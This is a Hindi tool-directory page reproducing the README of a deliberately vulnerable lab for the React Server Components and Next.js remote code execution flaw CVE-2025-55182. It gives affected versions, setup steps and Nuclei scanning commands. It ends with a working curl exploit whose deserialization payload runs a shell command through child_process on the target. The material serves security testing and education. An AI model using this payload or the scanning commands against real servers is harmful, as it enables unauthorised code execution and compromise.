Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
React2Shell-CVE-2025-55182-Testing-Environment — CVE-2025-55182 के लिए एक कंटेनरीकृत परीक्षण वातावरण, जो React Server Components में एक गंभीर (10.0 CVSS) रिमोट कोड निष्पादन भेद्यता है। | Kitploit
उपकरण/GitHubGitHub/abcfabian/react2shell-cve-2025-55182-testing-environment
कंटेनर सुरक्षाभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubabcfabian/react2shell-cve-2025-55182-testing-environment

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

React2Shell-CVE-2025-55182-Testing-Environment

CVE-2025-55182 के लिए एक कंटेनरीकृत परीक्षण वातावरण, जो React Server Components में एक गंभीर (10.0 CVSS) रिमोट कोड निष्पादन भेद्यता है।

रिपॉजिटरी देखें
11110 महीने पहलेअभी तक समीक्षित नहीं

React2Shell (CVE-2025-55182) परीक्षण वातावरण

CVE-2025-55182 के लिए एक कंटेनरीकृत परीक्षण वातावरण, जो React सर्वर घटकों में एक गंभीर (10.0 CVSS) दूरस्थ कोड निष्पादन भेद्यता है।

⚠️ चेतावनी

यह वातावरण जानबूझकर असुरक्षित है और इसका उपयोग केवल इसके लिए किया जाना चाहिए:

  • सुरक्षा अनुसंधान और शिक्षा
  • पृथक वातावरण में पेनिट्रेशन परीक्षण
  • भेद्यता यांत्रिकी को समझना

न करें:

  • इसे उत्पादन में तैनात करें
  • इसे इंटरनेट पर उजागर करें
  • दुर्भावनापूर्ण उद्देश्यों के लिए उपयोग करें

भेद्यता विवरण

  • CVE: CVE-2025-55182 (React), CVE-2025-66478 (Next.js)
  • गंभीरता: गंभीर (10.0)
  • प्रकार: अप्रमाणित दूरस्थ कोड निष्पादन
  • प्रभावित: Next.js 15.x/16.x ऐप राउटर में React सर्वर घटक
  • कमजोरी: CWE-502 (अविश्वसनीय डेटा का डिसीरियलाइज़ेशन)

प्रभावित संस्करण

React पैकेज:

  • react-server-dom-webpack: 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • react-server-dom-parcel: 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • react-server-dom-turbopack: 19.0.0, 19.1.0, 19.1.1, 19.2.0

Next.js:

  • 15.0.0 - 15.0.4
  • 15.1.0 - 15.1.8
  • 15.2.0 - 15.2.5
  • 15.3.0 - 15.3.5
  • 15.4.0 - 15.4.7
  • 15.5.0 - 15.5.6
  • 16.0.0 - 16.0.6

पैच किए गए संस्करण

React: 19.0.1, 19.1.2, 19.2.1 Next.js: 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7

त्वरित आरंभ

Podman का उपयोग करना (macOS)

# Build and start the vulnerable environment
podman compose up --build -d

# Check it's running
curl http://localhost:3000/api/status

# View logs
podman logs -f react2shell-vuln

# Stop
podman compose down

Docker Compose का उपयोग करना

# Build and start the vulnerable environment
docker-compose up --build -d

# Access the application at http://localhost:3000

परियोजना संरचना

.
├── README.md               # यह फ़ाइल
├── Dockerfile              # कंटेनर निर्माण निर्देश
├── Dockerfile.dev          # हॉट रीलोड के साथ विकास कंटेनर
├── docker-compose.yml      # Docker/Podman Compose कॉन्फ़िगरेशन
├── CVE-2025-55182.yaml     # Nuclei स्कैनर टेम्पलेट
├── scan.sh                 # सामान्य-उद्देश्य Nuclei स्कैनर स्क्रिप्ट
├── scan-results/           # स्कैन आउटपुट निर्देशिका
└── vulnerable-app/         # असुरक्षित Next.js एप्लिकेशन
    ├── package.json        # निर्भरताएँ (असुरक्षित संस्करण)
    ├── next.config.js      # Next.js कॉन्फ़िगरेशन
    ├── tsconfig.json       # TypeScript कॉन्फ़िगरेशन
    └── app/                # ऐप राउटर पेज और घटक
        ├── layout.tsx      # रूट लेआउट
        ├── page.tsx        # सर्वर घटकों के साथ मुख्य पेज
        ├── globals.css     # स्टाइल
        ├── actions.ts      # सर्वर एक्शन
        ├── api/status/     # स्थिति API एंडपॉइंट
        └── components/     # React घटक

भेद्यता के लिए स्कैनिंग

Nuclei टेम्पलेट डाउनलोड करें

यदि आपके पास टेम्पलेट नहीं है, तो इसे आधिकारिक nuclei-templates रिपॉजिटरी से डाउनलोड करें:

curl -o CVE-2025-55182.yaml https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/main/http/cves/2025/CVE-2025-55182.yaml

स्कैनर स्क्रिप्ट का उपयोग करना

शामिल scan.sh एक सामान्य-उद्देश्य Nuclei कंटेनर स्कैनर है जो Docker और Podman दोनों के साथ काम करता है।

# Scan the local vulnerable app
./scan.sh -u http://host.docker.internal:3000 -t CVE-2025-55182.yaml -v

# Scan any target
./scan.sh -u https://example.com -t CVE-2025-55182.yaml

# Scan with all Nuclei templates
./scan.sh -u https://example.com

# Scan multiple targets from a file
./scan.sh -l targets.txt -t CVE-2025-55182.yaml

# Filter by severity
./scan.sh -u https://example.com -s critical,high

# JSON output
./scan.sh -u https://example.com -t CVE-2025-55182.yaml -j

स्कैनर विकल्प

विकल्पविवरण
-u, --url <url>स्कैन करने के लिए एकल लक्ष्य URL
-l, --list <file>लक्ष्य URL की सूची वाली फ़ाइल
-t, --template <file>कस्टम टेम्पलेट फ़ाइल या निर्देशिका
-o, --output <dir>आउटपुट निर्देशिका (डिफ़ॉल्ट: ./scan-results)
-s, --severity <level>फ़िल्टर: info, low, medium, high, critical
-r, --rate-limit <n>प्रति सेकंड अधिकतम अनुरोध
-j, --jsonपरिणाम JSON प्रारूप में आउटपुट करें
-v, --verboseविस्तृत आउटपुट
-h, --helpसहायता संदेश दिखाएँ

मैन्युअल Nuclei स्कैन (Podman)

podman run --rm \
    -v "$(pwd)/CVE-2025-55182.yaml:/templates/CVE-2025-55182.yaml:ro" \
    docker.io/projectdiscovery/nuclei:latest \
    -t /templates/CVE-2025-55182.yaml \
    -u "http://host.docker.internal:3000" \
    -v

भेद्यता का परीक्षण

एक बार कंटेनर चल रहा हो:

  1. http://localhost:3000 पर एप्लिकेशन तक पहुँचें
  2. स्थिति API की जाँच करें: http://localhost:3000/api/status
  3. भेद्यता का पता लगाने के लिए स्कैनर चलाएँ
  4. एप्लिकेशन Next.js ऐप राउटर के माध्यम से React सर्वर घटकों का उपयोग करता है

नोट: भेद्यता में RSC प्रोटोकॉल में असुरक्षित डिसीरियलाइज़ेशन शामिल है। Nuclei टेम्पलेट इस विशिष्ट आक्रमण वेक्टर का परीक्षण करता है।

पैच किए गए संस्करण पर स्विच करना

पैच किए गए संस्करण का परीक्षण करने के लिए, vulnerable-app/package.json को संशोधित करें:

{
  "dependencies": {
    "next": "15.5.7",
    "react": "^19.1.2",
    "react-dom": "^19.1.2"
  }
}

फिर पुनर्निर्माण करें:

# Podman
podman compose down
podman compose up --build -d

# Docker
docker-compose down
docker-compose up --build

संदर्भ

  • React Security Advisory
  • Next.js Security Advisory
  • React Blog Post
  • react2shell.com
  • Nuclei Templates

अस्वीकरण

यह परीक्षण वातावरण केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए प्रदान किया गया है। रखरखावकर्ता इस सॉफ़्टवेयर के किसी भी दुरुपयोग के लिए उत्तरदायी नहीं हैं। सुरक्षा भेद्यताओं का परीक्षण करने से पहले हमेशा उचित प्राधिकरण प्राप्त करें।

Curl शोषण उदाहरण

curl -X POST http://localhost:3000 \
  -H "Next-Action: x" \
  -H "Content-Type: multipart/form-data; boundary=----WebKitFormBoundary" \
  -H "X-Nextjs-Request-Id: test123" \
  --data-binary $'------WebKitFormBoundary\r\nContent-Disposition: form-data; name="0"\r\n\r\n{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\\"then\\":\\"$B1337\\"}",
  "_response": {
    "_prefix":"var res=process.mainModule.require(\'child_process\').execSync(\'id\').toString().trim();;throw Object.assign(new Error(\'NEXT_REDIRECT\'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});",
    "_chunks": "$Q2",
    "_formData": {
      "get": "$1:constructor:constructor"
    }
  }
}\r\n------WebKitFormBoundary\r\nContent-Disposition: form-data; name="1"\r\n\r\n"$@0"\r\n------WebKitFormBoundary\r\nContent-Disposition: form-data; name="2"\r\n\r\n[]\r\n------WebKitFormBoundary--' \
  -i 2>&1 | grep -i "x-action-redirect"
टूल डाउनलोड करें